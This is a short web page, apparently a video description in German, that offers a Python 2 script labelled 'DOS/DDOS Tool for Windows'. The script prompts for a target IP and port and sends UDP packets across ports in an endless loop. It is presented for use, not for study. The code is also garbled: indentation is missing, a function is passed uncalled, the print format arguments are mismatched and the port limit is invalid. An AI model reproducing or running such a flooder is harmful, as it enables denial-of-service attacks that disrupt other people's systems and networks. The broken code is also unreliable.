У вашего броузера проблема в совместимости с HTML5
Um dieses Programm ausführen zu können brauchst du Python2
DOWNLOAD LINK (Python 2.7): https://www.heise.de/download/product/python-7192
HIER IST NOCHMAL DAS SCRIPT:
import os, time, socket, random
###############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom
###############
print
print "DOS/DDOS Tool for Windows"
print
print
ip = raw_input('Target-IP: ')
print
port = input('Port: ')
print
print
time.sleep(4)
print "Attacking Target-IP.."
time.sleep(3)
sent = 0
while True:
sock.sendto(bytes, (ip,port))
sent = sent + 1
port = port + 1
print "Attacking %s with %s BYTES through the Port: %s"%(sent,ip,port)
if port == 65543:
port = 1